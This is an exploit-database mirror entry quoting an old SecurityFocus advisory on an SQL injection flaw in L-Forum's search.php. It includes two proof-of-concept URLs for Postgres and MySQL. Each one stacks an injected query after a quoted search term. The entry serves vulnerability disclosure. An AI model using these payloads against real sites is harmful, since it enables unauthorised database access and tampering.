exploit-db-mirror/exploits/php/webapps/21708.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

11 lines
No EOL
540 B
Text

source: https://www.securityfocus.com/bid/5468/info
Reportedly, L-Forum is vulnerable to SQL injection attacks. The vulnerability lies in the file 'search.php'
L-Forum does not properly sanitize user input that is used as part of the search parameter in the 'search.php' file. SQL code may be inserted into the requests and executed by the database server.
Postgres:
http://localhost/search.php?search=a%27%20order%20by%20time%20desc%3b%20[query]
MySQL:
http://localhost/search.php?search=a%25%27%20order%20by%20time%20desc%3b%20[query]